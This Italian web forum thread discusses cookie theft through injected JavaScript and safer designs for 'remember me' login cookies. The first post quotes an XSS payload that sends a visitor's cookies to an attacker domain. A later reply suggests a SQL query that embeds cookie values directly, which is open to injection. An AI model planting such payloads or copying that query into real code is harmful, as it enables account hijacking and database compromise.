Pagina 1 di 3 1 2 3 ultimoultimo
Visualizzazione dei risultati da 1 a 10 su 28

furto dei cookie e riutilizzo

documentandomi un pò in giro ho capito che se un utente riesce ad immettere codice malevolo (prevalentemente js) all'interno di un mio sito ha la possibilità di "rubare" i cookie degli utenti che visualizzzano la pagina.
    Infatti js riesce a leggere i cookie dell'oggetto cookie e pertanto se, ad esempio, in un commento ad una news si riuscisse ad inserire una cosa di questo tipo:
    codice:
    <script>
    var manda_cookie_tramite_img = new Image();
    manda_cookie_tramite_img.src = "//furtocookie.com/?" + encodeURIcomponent(document.cookie);
    </script>
    il sito furtocookie.com otterra i cookie dell'utente che visita la mia pagina. Da qui:
    - necessita di filtrare gli input (strip_tags, htmlentities, etc etc)
    - non salvare dati sensibili nei cookies

fin qui ci sono!!

IL PROBLEMA:
    il mio sistema di login salva in un cookies l'username (in chiaro) e la password (criptata).
    all'accesso al mio sito se isset i due cookies e questi corrispondono a quelli del db risulta essere loggato.

Ma poniamo il caso che malauguratamente un utente si impossessi sei due cookies sopra citati... può autoimpostarsi i cookie al suo browser e accedere cmq al mio sito spacciandosi per l'utente vittima del furto?
    se si come prevenire il problema (sempre utilizzando i cookie)?

Re: furto dei cookie e riutilizzo

Originariamente inviato da oly1982
    Ma poniamo il caso che malauguratamente un utente si impossessi sei due cookies sopra citati... può autoimpostarsi i cookie al suo browser e accedere cmq al mio sito spacciandosi per l'utente vittima del furto?
    Si

Originariamente inviato da oly1982 se si come prevenire il problema (sempre utilizzando i cookie)?
    Del tutto non puoi, ma puoi migliorare la cosa con qualche accorgimento:
    • limita la durata dei cookie cosi' l'accesso rubato dopo un po' scade
    • non registrare nei cookie lo username in chiaro, registrane un hash (cosi' non puo' essere usato nella finestra di login)
    • non registrare mai la password, neanche se criptata, piuttosto per identificare l'utente registra nei cookie un identificatore (la versione hashata dello user magari con un salt) e un token (un codice unico generato a caso ogni volta che l'utente effettua il login): in questo modo non sveli nessuna informazione che possa essere usata per ottenere nuovamente l'accesso

k.b docet...

Usa le sessioni, evita di usare solo cookie.

La questione interessa anche me.

K.b rileggevo quello che hai scritto, ma mi è venuto un dubbio.

# non registrare nei cookie lo username in chiaro, registrane un hash (cosi' non puo' essere usato nella finestra di login)
    # non registrare mai la password, neanche se criptata, piuttosto per identificare l'utente registra nei cookie un identificatore (la versione hashata dello user magari con un salt) e un token (un codice unico generato a caso ogni volta che l'utente effettua il login): in questo modo non sveli nessuna informazione che possa essere usata per ottenere nuovamente l'accesso

Ponendo il caso di non salvare nel cookie l'username in chiaro, come è possibile salvarlo tramite hash e poi, al momento della visita da parte dello stesso utente sul sito, riconoscerlo in automatico?

Parli di identificatore, user+salt hashato ma come fai poi a recuperare i dati dell'utente.

Sarà la giornata, ma mi sono bloccato su sta cosa

PS: Non è una critica, ma vorrei capire come farlo

Utente di HTML.it L'avatar di bubi1
    Originariamente inviato da Samleo
    La questione interessa anche me.

K.b rileggevo quello che hai scritto, ma mi è venuto un dubbio.

Ponendo il caso di non salvare nel cookie l'username in chiaro, come è possibile salvarlo tramite hash e poi, al momento della visita da parte dello stesso utente sul sito, riconoscerlo in automatico?

Parli di identificatore, user+salt hashato ma come fai poi a recuperare i dati dell'utente.

Sarà la giornata, ma mi sono bloccato su sta cosa

PS: Non è una critica, ma vorrei capire come farlo
    select from utenti where sha1(concat(username,salt)) = '$hash_da_cookie' and token='$token_da_cookie'

Scusa, ma se io sniffo i cookie, e prelevo il cookie hashato e criptato, e poi provo a fare il login tramite cookie con quei dati sniffati, in teoria eseguo lo stesso il login no?

Perchè tanto lui accetta i codici criptati.

O forse ho capito male!

Puoi essere più chiaro?

Originariamente inviato da bubi1
    select from utenti where sha1(concat(username,salt)) = '$hash_da_cookie' and token='$token_da_cookie'
    non ci sono nemmeno io...
    che senso ha cryptare l'username??

un utente ha 2 cookie username hashato e token (codice univoco, salvato nel db)
    se all'accesso sul mio sito se esistono i due cookies (faccio la tua query) e se i dati coincidono con quelli nel db => utente loggato
    a quel punto l'username è in chiaro "Benvenuto Tizio!" (con username in chiaro)

Vorrei ricordare che il mio scopo con i cookie è evitare che ad ogni accesso l'utente debba rifare il login; mentre sono ben consapevole che con le sessioni molti di tali problemi non si vengono a verificare (in tal caso salvo in sessione l'id del record e un token chiamato 'loggato')

Originariamente inviato da Samleo
    Scusa, ma se io sniffo i cookie, e prelevo il cookie hashato e criptato, e poi provo a fare il login tramite cookie con quei dati sniffati, in teoria eseguo lo stesso il login no?

Perchè tanto lui accetta i codici criptati.

O forse ho capito male!

Puoi essere più chiaro?
    Non puoi fare il login con i dati criptati, perche' una pagina di login accetta solo dati in chiaro che POI cripta. Se uno si impossessa dei cookie non puoi impedirgli di accedere, ma - come dicevo - puoi limitare i danni dando una scadenza alla sessione (quindi niente cookie che durano per sempre) e non svelando nessun dato utile ad un futuro login.

Le sessioni non risolvono niente perche' tanto il session id viene propagato tramite cookie.

Permessi di invio